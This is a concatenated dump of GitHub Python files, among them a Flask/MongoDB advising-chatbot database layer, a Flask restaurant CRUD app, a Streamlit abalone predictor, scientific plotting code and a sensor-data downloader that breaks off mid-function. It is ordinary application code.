= self.wire('nq', 1)\r\n Not(self, 'nq', q, nq)\r\n \r\n d = self.wire('d', 1)\r\n Mux2(self, 'mux', t, q, nq, d)\r\n Reg(self, 'reg', d, e, q)\r\n ","repo_name":"b-aravind99/py4hw","sub_path":"py4hw/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"13964793678","text":"from flask import jsonify\nfrom pymongo import ReturnDocument, MongoClient # so that we can return the updated version of the document after updating it\nfrom bson.objectid import ObjectId\nfrom datetime import datetime # so that we can add a date that a statistic was added\ndate_time_format = '%Y-%m-%d %H:%M:%S' # we format datetime as YYYY-MM-DD HH:MM:SS\n\ndef get_intents():\n return jsonify(intents=[\n {\n 'tag':'test',\n 'patterns':['test1', 'test2', 'test3'],\n 'responses':['Oh hey, nice test!'],\n 'context':[]\n }\n ])\n\ndef return_all(mongo, Collection = 'questions'):\n found = mongo.db[Collection].find({})\n \n if (found is None): # if it comes back empty\n return jsonify({'result':'no results'})\n\n list = []\n for i in found: # itt=erate over cursor \n fickleID = i.pop('_id') # jsonify() doesn't know how to handle objects of type ObjectID, so we remove it\n i.update({'_id': str(fickleID)}) # put _id back in but as a regular string now\n list.append(i)\n\n return list #return result \n\ndef add_question(mongo, question):\n exists, q_name = check_question_exists(mongo, '', question['tags'])\n\n if exists:\n return None, q_name\n \n new_question = question\n # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n InsertOneResult_Obj = mongo.db.questions.insert_one(new_question)\n # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n new_question.update({'_id':str(InsertOneResult_Obj.inserted_id)}) \n \n return new_question, ''\n\n\ndef update_question(mongo, id, update_dict):\n exists, q_name = check_question_exists(mongo, id, update_dict['tags'])\n\n if exists:\n return None, q_name\n\n if 'contact' not in update_dict:\n remove_one_field(mongo, id, 'contact')\n\n if 'follow-up' not in update_dict:\n remove_one_field(mongo, id, 'follow-up')\n\n updated = mongo.db.questions.find_one_and_update(\n {\n '_id': ObjectId(id)\n }, \n {\n '$set': update_dict\n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER 
# need this or else it returns the document from before the update\n )\n if (updated is None): # if there is no match\n return None, ''\n \n fickleID = updated.pop('_id') # jsonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id': str(fickleID)}) # put _id back in but as a regular string now\n\n return updated, ''\n\ndef update_question_follow_ups(mongo, follow_id, new_name):\n mongo.db.questions.update_many(\n {\n 'follow-up._id': follow_id\n },\n {\n '$set': {'follow-up.name':new_name}\n }\n )\n\n\ndef check_question_exists(mongo, id, tags):\n result = mongo.db.questions.find_one({\n \"tags\" : {\n \"$all\":tags\n }\n })\n if result is None:\n return False, ''\n else:\n check = result['_id']\n if str(check) != id:\n return True, result['name']\n return False, ''\n\ndef delete_question(mongo, id):\n result = mongo.db.questions.delete_one({'_id':ObjectId(id)})\n if result.deleted_count == 1:\n return True, 'Question successfully deleted'\n else:\n return False, 'Question could not be found'\n\n\ndef add_tag(mongo, name, type):\n new_tag = {'name': name, 'type': type} # we make sure all tags are lower case\n if (check_tag_exists(mongo, name, type)):\n return None\n \n InsertOneResult_Obj = mongo.db.tags.insert_one(new_tag) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n \n new_tag.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n return new_tag\n\ndef check_tag_exists(mongo, name, type):\n result = mongo.db.tags.find_one({\n \"name\": name,\n \"type\": type\n })\n return result is not None\n\n\ndef update_tag(mongo, old_dict, update):\n updated = mongo.db.tags.find_one_and_update(\n {\n '_id': ObjectId(old_dict['_id'])\n }, \n {\n '$set': update\n },\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return None\n\n fickleID = updated.pop('_id') # jasonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return_all_with_tag(mongo, old_dict['name'], old_dict['type'], update['name'])\n\n return updated\n\ndef delete_tag(mongo, id, name, type):\n element = -1\n if (type == 'intent'):\n element = 0\n elif (type == 'department'):\n element = 1\n elif (type == 'category'):\n element = 2\n elif (type == 'information'):\n element = 3\n else:\n return False, 'Tag has invalid type'\n\n # if no question is using this tag, we may delete it:\n found = mongo.db.questions.find({'tags.'+str(element):name}) \n if (found.count() == 0):\n to_delete = mongo.db.tags.delete_one({'_id':ObjectId(id)})\n if (to_delete.deleted_count == 0): #if there is no match\n return False, 'Tag could not be found'\n else:\n return True, 'Tag successfully deleted'\n else:\n return False, 'Tag has dependent questions'\n\ndef check_valid_user(mongo, nid):\n result = mongo.db.users.find_one({\n \"NID\":nid\n })\n if result is None:\n return False, False\n elif result['IsAdmin']:\n return True, True\n else:\n return True, False\n\ndef add_user(mongo, user):\n new_user = user\n \n InsertOneResult_Obj = mongo.db.users.insert_one(new_user) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n\n if new_user is None:\n return None\n \n 
new_user.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n return new_user\n\ndef update_user(mongo, id, NID, name, email, IsAdmin):\n updated = mongo.db.users.find_one_and_update(\n {\n '_id': ObjectId(id)\n }, \n {\n '$set': { 'NID':NID, 'name':name, 'email':email, 'IsAdmin':IsAdmin}\n },\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return None\n\n fickleID = updated.pop('_id') # jasonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return updated\n\ndef delete_user(mongo, id):\n to_delete = mongo.db.users.delete_one(\n {\n '_id':ObjectId(id)\n }\n )\n if (to_delete.deleted_count == 0): #if there is no match\n return False, 'User not found.'\n \n return True, 'User successfully deleted.'\n\n# def add_link(mongo, name, url):\n# new_link = {'name': name, 'url':url}\n \n# InsertOneResult_Obj = mongo.db.links.insert_one(new_link) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n \n# new_link.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n# return new_link\n\n# def update_link(mongo, id, update):\n# updated = mongo.db.links.find_one_and_update(\n# {\n# '_id': ObjectId(id)\n# }, \n# {\n# '$set': update\n# },\n# return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n# )\n# if (updated is None): #if there is no match\n# return None\n\n# fickleID = updated.pop('_id') # jasonify() doens't know how to handle objects of type ObjectID, so we remove it\n# updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n# return updated\n\n# def delete_link(mongo, id):\n# # if no question is using this link, we may delete it immediately:\n# found = mongo.db.questions.find({'links._id':id}) # assumes questions link to link via _id stored as a string\n \n# to_delete = mongo.db.links.delete_one(\n# {\n# '_id':ObjectId(id)\n# }\n# )\n# if (to_delete.deleted_count == 0): #if there is no match\n# return False, 'Could not find Link.'\n# if (found.count() > 0): # if it is being used, delete every instance\n# for i in found: # itterate over curor \n# remove_one_element(mongo, str(i['_id']), id, 'links._id')\n\n# return True, 'Link successfully deleted'\n\n\ndef remove_one_element(mongo, id_of_question_with_array, id_of_element, array_name):\n found = mongo.db.questions.find_one_and_update( \n {\n '_id':ObjectId(id_of_question_with_array)\n }, \n {\n '$pull' : {array_name : id_of_element}\n },\n return_document=ReturnDocument.AFTER\n )\n if (found is None): # if there is no match\n return None\n\n if not found[array_name]: # delete the whole links field if the deletion makes it empty\n remove_one_field(mongo, id_of_question_with_array, array_name)\n\n fickleID = found.pop('_id') # jasonify() doens't know how to handle objects of type ObjectID, so we remove it\n found.update({'_id': str(fickleID)}) # put _id back in but as a regular string now\n\n return found #return result as json\n\n\ndef remove_one_field(mongo, id_of_question_with_field, field): # tags = ['beep boop', 'noop', 'yoop', 'ploop'], field = 'related 
questions'\n found = mongo.db.questions.find_one_and_update( \n {\n '$and': [\n {'_id':ObjectId(id_of_question_with_field)},#{'tags': { '$all': [x.lower() for x in tags] }},\n {field: {'$exists': True} }\n ]\n }, \n {\n '$unset': { field:\"\" }\n },\n return_document=ReturnDocument.AFTER\n )\n if (found is None): # if there is no match\n return None\n\n fickleID = found.pop('_id') # jasonify() doens't know how to handle objects of type ObjectID, so we remove it\n found.update({'_id': str(fickleID)}) # put _id back in but as a regular string now\n\n return found #return result as json\n\n\ndef add_contact(mongo, contact):\n new_contact = contact\n \n InsertOneResult_Obj = mongo.db.contacts.insert_one(new_contact) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n \n new_contact.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n return new_contact\n\n\ndef update_contact(mongo, id, update):\n\n found = mongo.db.questions.find({'contact._id':id})\n\n if found.count() != 0:\n mongo.db.questions.update_many(\n {\n 'contact._id':id\n },\n {\n '$set': {\n 'contact.title':update['title'],\n 'contact.name':update['name'],\n 'contact.email':update['email']\n }\n }\n )\n\n updated = mongo.db.contacts.find_one_and_update(\n {\n '_id': ObjectId(id)\n }, \n {\n '$set': update\n } if 'departments' in update else { # if the updated contact doesn't have a departments array, remove it\n '$set': update,\n '$unset': {'departments':''}\n },\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return None\n\n fickleID = updated.pop('_id') # jasonify() doens't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return updated\n\n\ndef delete_contact(mongo, id):\n # if no question is using this contact, we may delete it immediately:\n found = mongo.db.questions.find({'contact._id':id}) # assumes questions link to link via _id stored as a string\n \n if (found.count() != 0): # if it is being used, delete every instance\n for i in found: # itterate over curor \n remove_one_field(mongo, str(i['_id']), 'contact')\n\n to_delete = mongo.db.contacts.delete_one(\n {\n '_id':ObjectId(id)\n }\n )\n if (to_delete.deleted_count == 0): #if there is no match\n return False, 'Could not find Contact.'\n else:\n return True, 'Contact successfully deleted'\n\n\n# Order for Tags:\n# 1. Intent (intents)\n# 2. Department (dept)\n# 3. Category (cat)\n# 4. Information (info)\n\n# update all questions in the database with this tag\ndef return_all_with_tag(mongo, tag, type, replace):\n element = -1\n if (type == 'intents'):\n element = 0\n elif (type == 'dept'):\n element = 1\n elif (type == 'cat'):\n element = 2\n elif (type == 'info'):\n element = 3\n else:\n return jsonify({'result':'incorrect type. 
valid types: intents, dept, cat, info'})\n\n found = mongo.db.questions.update_many(\n {\n 'tags.'+str(element):tag\n },\n {\n '$set': { 'tags.'+str(element):replace } \n },\n upsert=False, # upsert = if thing does not exist, make it exist\n )\n \n if (found is None): # if it comes back empty\n return jsonify({'result':'no results'})\n\n return found.acknowledged # update_many doesn't return a document\n\ndef needs_update_check(mongo):\n found = mongo.db.settings.find_one({'name':'needs training'}) \n\n if (found is None): # if there is no match\n return None\n\n return found['needs training'] #return result setting\n\ndef set_needs_update(mongo, value='Needs Training'):\n updated = mongo.db.settings.find_one_and_update(\n {'name':'needs training'}, \n {\n '$set': { 'needs training':value }\n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return False\n\n return True\n\n\ndef form_response(mongo, answered, rating, simplicity):\n if answered == \"yes\":\n new_form_response = {'answered': True, 'rating': int(rating), 'simplicity': int(simplicity), 'date/time added': datetime.utcnow() }\n else: \n new_form_response = {'answered': False, 'rating': int(rating), 'simplicity': int(simplicity), 'date/time added': datetime.utcnow() }\n \n InsertOneResult_Obj = mongo.db.form_responses.insert_one(new_form_response) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n \n new_form_response.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_stat with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n return new_form_response,''\n\ndef add_unseen(mongo, question):\n new_question = {'question':question, 'date/time added': datetime.utcnow(), 'resolved': False, \"date/time resolved\": None}\n result = mongo.db.unanswered.find_one({\n \"question\": question\n })\n if result is None:\n InsertOneResult_Obj = mongo.db.unanswered.insert_one(new_question) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n new_question.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n return \"question was added\"\n else:\n return \"question already exists\"\n \ndef inc_num_of_questions_asked(mongo):\n updated = mongo.db.statistics.find_one_and_update(\n {\n 'statistic':'number of questions asked'\n }, \n {\n '$inc': { 'count': 1 } \n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return jsonify({'result':'no match'})\n\n fickleID = updated.pop('_id') # jasonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return jsonify(updated)\n\ndef inc_num_questions_answered_correctly(mongo):\n updated = mongo.db.statistics.find_one_and_update(\n {\n 'statistic':'number of questions answered correctly'\n }, \n {\n '$inc': { 'count': 1 } \n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the 
update\n    )\n    if (updated is None): #if there is no match\n        return jsonify({'result':'no match'})\n\n    fickleID = updated.pop('_id') # jsonify() doesn't know how to handle objects of type ObjectID, so we remove it\n    updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n    return jsonify(updated)\n\ndef inc_num_times_referred_to_advisor(mongo):\n    updated = mongo.db.statistics.find_one_and_update(\n        {\n            'statistic':'number of times referred to advisor'\n        }, \n        {\n            '$inc': { 'count': 1 } \n        },\n        upsert=False, # upsert = if thing does not exist, make it exist\n        return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n    )\n    if (updated is None): #if there is no match\n        return jsonify({'result':'no match'})\n\n    fickleID = updated.pop('_id') # jsonify() doesn't know how to handle objects of type ObjectID, so we remove it\n    updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n    return jsonify(updated)\n\ndef get_contact(mongo):\n    contact = mongo.db.contacts.find_one({\"title\": \"Undergraduate Coordinator\"})\n    if contact is None:\n        return jsonify({\"result\": \"no match\"})\n    \n    fickleID = contact.pop('_id') \n    contact.update({'_id':str(fickleID)})\n    return jsonify(contact)","repo_name":"ucfcs/ucf-ai-advising-chatbot","sub_path":"backend/src/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":17572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31098245647","text":"from pylab import plt, np\nimport os\n\nimport backup\n\n\ndef profits_over_distance(\n        file_name, folder=None, separate_A_and_B=True):\n\n    if folder is None:\n        folder = \"data/figures\"\n\n    os.makedirs(folder, exist_ok=True)\n\n    pool_backup = backup.PoolBackup.load(file_name=file_name)\n\n    parameters = pool_backup.parameters\n    backups = pool_backup.backups\n\n    n_simulations = parameters.n_simulations\n\n    # Containers\n    x = np.zeros(n_simulations)\n    y = np.zeros((2, n_simulations))\n\n    for i, b in enumerate(backups):\n\n        # Compute the mean distance between the two firms\n        data = np.absolute(\n            b.positions[:, 0] -\n            b.positions[:, 1]) / parameters.n_positions\n\n        spacing = np.mean(data)\n        x[i] = spacing\n\n        # Get profits\n        profit_max = parameters.n_positions * parameters.n_prices * parameters.unit_value\n        for f in range(2):\n            y[f, i] = np.mean(b.profits[:, f]) / profit_max\n\n    # Plot this\n    fig = plt.figure(figsize=(10, 6))\n    ax = plt.subplot()\n\n    # ax.set_xlim(-0.01, 1.01)\n    # ax.set_ylim(-0.01, 0.51)\n\n    ax.set_xticks(np.arange(0, 1.1, 0.25))\n    ax.set_yticks(np.arange(0, 0.51, 0.1))\n\n    add_title_and_labels(ax)\n    add_comment_with_file_name(fig=fig, file_name=file_name)\n\n    if separate_A_and_B is True:\n        ax.scatter(x, y[0], zorder=10, alpha=0.25, label=\"Firm A\")\n        ax.scatter(x, y[1], zorder=10, alpha=0.25, label=\"Firm B\")\n        add_fitting_curve(ax=ax, x=x, y=y[0])\n        add_fitting_curve(ax=ax, x=x, y=y[1])\n        plt.legend()\n\n    else:\n        ax.scatter(x, np.mean(y, axis=0), zorder=10, alpha=0.25, color=\"black\")\n\n    plt.tight_layout()\n\n    if file_name:\n        plt.savefig(\"{}/{}_profits_over_distance.pdf\".format(folder, file_name))\n\n    plt.show()\n\n\ndef add_comment_with_file_name(fig, file_name):\n    plt.text(0.005, 0.005, file_name, transform=fig.transFigure, fontsize='x-small', color='0.5')\n\n\ndef add_fitting_curve(ax, x, y):\n\n    from scipy.optimize import least_squares\n\n    def model(x, u):\n        return x[0] * (u ** 2 + x[1] * u) / (u ** 2 + 
x[2] * u + x[3])\n\n def fun(x, u, y):\n return model(x, u) - y\n\n order = np.argsort(x)\n\n xdata = x[order]\n ydata = y[order]\n\n x0 = np.zeros(4)\n\n res = least_squares(fun, x0, bounds=(-1, 100), args=(xdata, ydata), verbose=1).x\n\n u_test = np.linspace(0, 1)\n ax.plot(u_test, model(res, u_test), '--', zorder=-10)\n\n\ndef add_title_and_labels(ax):\n\n ax.set_xlabel(\"Mean distance\")\n ax.set_ylabel(\"Mean profits\")\n\n ax.set_title(\"Profits over distance\")\n\n","repo_name":"AurelienNioche/HotellingBathtub","sub_path":"analysis/pool/profits_over_distance.py","file_name":"profits_over_distance.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13735299015","text":"from api import is_factor, reject, fst, range_, apply, filter_, also, inc, each, len_, lt, \\\n compress, thenEach, append, is_mult, until, eq, snd\n\nfactors = also(inc) | each( [is_factor, range_(1)]) | apply(filter_)\n\nis_prime = factors | len_ | lt(3)\n\nprimes_naive = range_(2) | filter_(is_prime) | compress\n\nnext_prime = thenEach(fst | fst, [lambda x, xs: reject(is_mult(x), xs), append] )\nprimes_sieve_of_erosthenes = lambda n: until(\n fst | eq([]),\n next_prime,\n [range_(2, n), []]\n) | snd\n\n\ndef primes_imperative(n):\n primes = []\n candidates = range(2, n)\n while candidates:\n next_prime = candidates[0]\n candidates = [x for x in candidates if not x % next_prime == 0]\n primes.append(next_prime)\n return primes","repo_name":"KayaLuken/pype","sub_path":"projectEuler/_3_prime_factors.py","file_name":"_3_prime_factors.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4813370816","text":"import os\n\nfrom configparser import ConfigParser\nfrom flask import (flash,\n Flask,\n jsonify,\n redirect,\n render_template,\n request,\n url_for)\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\n\nconfig = ConfigParser()\nconfig.read('config.ini')\nHOST = config['MYSQL']['host']\nUSERNAME = config['MYSQL']['username']\nPASSWORD = config['MYSQL']['password']\nDB = config['MYSQL']['name']\n\napp = Flask(__name__)\nengine = create_engine('mysql://%s:%s@%s/%s' % (USERNAME, PASSWORD, HOST, DB))\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n@app.route('/')\n@app.route('/restaurants')\ndef showRestaurants():\n restaurants = session.query(Restaurant).all()\n return render_template('restaurants.html', restaurants=restaurants)\n\n@app.route('/restaurant/new', methods=['GET', 'POST'])\ndef newRestaurant():\n if request.method == 'POST':\n new_restaurant = Restaurant(name=request.form['name'],\n description=request.form['description'])\n session.add(new_restaurant)\n session.commit()\n flash(\"A new restaurant is created!\")\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('newrestaurant.html')\n\n@app.route('/restaurant//edit', methods=['GET', 'POST'])\ndef editRestaurant(restaurant_id):\n edited_restaurant = session.query(Restaurant).filter_by(id=restaurant_id) \\\n .one()\n if request.method == 'POST':\n if request.form['name']:\n edited_restaurant.name = request.form['name']\n session.add(edited_restaurant)\n session.commit()\n flash(\"Restaurant has been edited\")\n return redirect(url_for('showRestaurants'))\n if request.form['description']:\n 
edited_restaurant.description = request.form['description']\n session.add(edited_restaurant)\n session.commit()\n flash(\"Restaurant has been edited\")\n return redirect(url_for('showRestaurants'))\n else:\n return render_template(\n 'editrestaurant.html', restaurant_id=restaurant_id,\n restaurant=edited_restaurant)\n\n@app.route('/restaurant//delete', methods=['GET', 'POST'])\ndef deleteRestaurant(restaurant_id):\n restaurant_to_delete = session.query(Restaurant) \\\n .filter_by(id=restaurant_id).one()\n if request.method == 'POST':\n session.delete(restaurant_to_delete)\n session.commit()\n flash(\"Restaurant has been deleted\")\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('deleterestaurant.html',\n restaurant=restaurant_to_delete)\n\n@app.route('/restaurants/JSON')\ndef showRestaurantsJSON():\n restaurants = session.query(Restaurant).all()\n return jsonify(Restaurants=[restaurant.serialize\n for restaurant in restaurants])\n\n@app.route('/restaurants//menu/JSON')\ndef restaurantMenuJSON(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n items = session.query(MenuItem).filter_by(\n restaurant_id=restaurant_id).all()\n return jsonify(MenuItems=[i.serialize for i in items])\n\n# JSON ENDPOINT\n@app.route('/restaurants//menu//JSON')\ndef menuItemJSON(restaurant_id, menu_id):\n menu_item = session.query(MenuItem).filter_by(id=menu_id).one()\n return jsonify(MenuItem=menu_item.serialize)\n\n@app.route('/')\n@app.route('/restaurants//')\ndef restaurantMenu(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n items = session.query(MenuItem).filter_by(restaurant_id=restaurant_id)\n return render_template('menu.html', restaurant=restaurant, items=items)\n\n@app.route('/restaurants//new', methods=['GET', 'POST'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n new_item = MenuItem(name=request.form['name'],\n description=request.form['description'],\n price=request.form['price'],\n course=request.form['course'],\n restaurant_id=restaurant_id)\n session.add(new_item)\n session.commit()\n flash(\"A new menu item is created!\")\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template('newmenuitem.html', restaurant_id=restaurant_id)\n\n@app.route('/restaurants///edit',\n methods=['GET', 'POST'])\ndef editMenuItem(restaurant_id, menu_id):\n edited_item = session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method == 'POST':\n if request.form['name']:\n edited_item.name = request.form['name']\n session.add(edited_item)\n session.commit()\n flash(\"Menu Item has been edited\")\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template('editmenuitem.html',\n restaurant_id=restaurant_id,\n menu_id=menu_id,\n item=edited_item)\n\n@app.route('/restaurants///delete',\n methods=['GET', 'POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n item_to_delete = session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method == 'POST':\n session.delete(item_to_delete)\n session.commit()\n flash(\"Menu Item has been deleted\")\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template('deleteconfirmation.html', item=item_to_delete)\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', 
port=port)\n","repo_name":"OlhaLesk/Restaurant_flask","sub_path":"restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9164077111","text":"import streamlit as st\nimport pandas as pd\n\nst.title(\"Abalone dataset\")\n\nlength = st.number_input(\"length\")\ndiameter = st.number_input(\"diameter\")\nheight = st.number_input(\"height\")\nwhole_weight = st.number_input(\"whole_weight\")\nshucked_weight = st.number_input(\"shucked_weight\")\nviscera_weight = st.number_input(\"viscera_weight\")\nshell_weight = st.number_input(\"shell weight\")\nrings = st.number_input(\"rings\")\n\ndictionary = {\n'length' : length,\n'diameter' : diameter,\n'height' : height,\n'whole_weight' : whole_weight,\n'shucked_weight' : shucked_weight,\n'viscera_weight' : viscera_weight,\n'shell_weight' : shell_weight,\n'rings' : rings\n}\ndata = pd.DataFrame(data=dictionary, index=[0])\nst.dataframe(data)\n\n\nif st.button(\"Model run\"):\n    import pickle\n    model = pickle.load(open(\"../model/model.pkl\", \"rb\"))\n    st.write(f\"The output of the Model :- {model.predict(data.values)[0]}\")","repo_name":"CodeNetra-official/ProTon-batch-1","sub_path":"Abalone/app_backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6617424517","text":"\"\"\"A module for configuring database through SQLAlchemy.\"\"\"\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom . import db_models\n\n# database connection string.\nSQLALCHEMY_DB_URL = \"sqlite:///.blog.db\"\n\n# creating engine, i.e. connecting with the db engine.\nengine = create_engine(SQLALCHEMY_DB_URL, connect_args={\"check_same_thread\": False})\n\n# creating tables.\n# db_models.Base.metadata.create_all(bind=engine)\n\n# creating session factory bound to the engine.\nsession_factory = sessionmaker(bind=engine, autocommit=False, autoflush=False)\n\n# session manager function\ndef get_session():\n    session = session_factory()\n    try:\n        yield session\n    finally:\n        session.close()","repo_name":"Kiran-Sawant/learning-FastAPI","sub_path":"blog/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25896307593","text":"# -*- coding: utf-8 -*-\r\n\r\ndef test_bot_error():\r\n    \"test if Announce works as it should\"\r\n\r\n    from gbot.action import url_map\r\n    from gbot.models import Player, Room\r\n\r\n    fareko = Player.get(login = 'fareko')\r\n    room = Room.get(name = \"0SPL-Allstars Slaves Room\")\r\n\r\n    action = url_map['!ann'](player = fareko, room = room, param_string = 'yay!')\r\n    action()\r\n\r\n    assert len(action.announces) == 1\r\n    assert len(action.privates) == 0\r\n\r\n    assert action.announces[0] == u\"fareko => yay!\"\r\n","repo_name":"tony-brewerio/ggbot-old","sub_path":"test/test_action_announce.py","file_name":"test_action_announce.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34832210443","text":"from unittest.mock import patch\n\nfrom django.test import TestCase, override_settings\n\nfrom .. import tasks\nfrom . 
import create_owner\nfrom .testdata.load_entities import load_entities\nfrom .testdata.load_eveuniverse import load_eveuniverse\nfrom .testdata.load_locations import load_locations\n\nTASKS_PATH = \"blueprints.tasks\"\n\n\n@override_settings(CELERY_ALWAYS_EAGER=True)\nclass TestUpdateBlueprints(TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n super().setUpClass()\n load_entities()\n load_eveuniverse()\n load_locations()\n cls.owner = create_owner(character_id=1101, corporation_id=2101)\n\n @patch(TASKS_PATH + \".Owner.update_blueprints_esi\")\n def test_update_blueprints_for_owner(self, mock_update_blueprints_esi):\n tasks.update_blueprints_for_owner(self.owner.pk)\n self.assertTrue(mock_update_blueprints_esi.called)\n\n @patch(TASKS_PATH + \".Owner.update_blueprints_esi\")\n def test_update_all_blueprints(self, mock_update_blueprints_esi):\n tasks.update_all_blueprints()\n self.assertTrue(mock_update_blueprints_esi.called)\n","repo_name":"staropera/aa-blueprints","sub_path":"blueprints/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74714474611","text":"import requests\nimport numpy as np\nimport pandas as pd\nimport itertools\nfrom numpy import ravel\nfrom datetime import datetime\nimport math\nfrom scipy import signal\nfrom scipy.signal import medfilt\nfrom scipy.signal import butter\nfrom config import *\n\n\"Section I: download and prepare data\"\n\ndef get_data(start,end,device,sensors = (SENSORS)):\n \"\"\"\n sends request to server and returns\n s2 and accelerometer (nested) data only\n - start -> starting timestamp\n - end -> ending timestamp\n - device -> device UUID\n \"\"\"\n response = requests.get(f\"https://data.embry.tech/download/?start={start}&end={end}&device_UUID={device}\")\n if response.status_code==200:\n data = response.json()\n data = {sensor:[[j[sensor] for j in i[\"doc\"][\"data\"]] for i in data[\"rows\"]] for sensor in sensors}\n \n assert len(data)==len(sensors) \n return data\n else:\n print(\"Request error!\")\n\ndef unnest_data(data):\n \"\"\"\n uses itertools to unnest nested list\n \"\"\"\n return list(itertools.chain.from_iterable(data))\n\ndef download_prepare_data(data, sensors=SENSORS):\n \"\"\"\n First, create empty columns, for adding the data\n Second, actually download and append data\n Third, clean empty data\n Forth, create id for future merging\n \"\"\"\n \n for i in sensors:\n data[f'{i}_raw']='empty'\n for i in range(0, data.shape[0]):\n try:\n data_c=get_data(*data.iloc[i,[4,5,2]], sensors = (SENSORS))\n for j in SENSORS:\n data[f'{j}_raw'].iloc[i]=unnest_data(data_c[j])\n except:\n for j in SENSORS:\n data[f'{j}_raw'].iloc[i]=[]\n\n data = data[data['s2_raw'].apply(lambda x: len(x)>0)].reset_index(drop=True)\n data['id']=[f\"user_{data.index[i]}\" for i in range(0, data.shape[0])]\n \n return data\n\ndef filter_data(data, sensors=SENSORS):\n \"\"\"\n filtering data of 'x' and 'z' sensors for cycles detection in bike activities \n \"\"\"\n for i in range(0, data.shape[0]):\n data_c=get_data(*data.iloc[i,[4,5,2]], sensors = (SENSORS))\n for j in 